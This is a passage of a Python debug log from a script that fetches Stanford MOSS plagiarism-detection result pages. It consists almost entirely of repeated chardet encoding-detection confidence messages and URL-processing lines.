active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40587\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40586\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5278863498398251\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match178-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match171-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match172-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match174-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match179-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match181-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19102\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19115\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19102\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19103\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19102\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20465\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5456726203364073\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544952431142531\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20452\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20465\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20452\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5607398546984015\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5440386035620236\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-0.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20452\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match180-1.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20453\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match182-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20452\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.544320562855735\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match186-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 14512\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 14499\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 14512\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5375114513393936\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 14499\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19571\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 14499\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19584\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 14500\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 14499\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19571\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19572\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19571\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5448240006296101\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5487983285591304\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5300634620671929\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 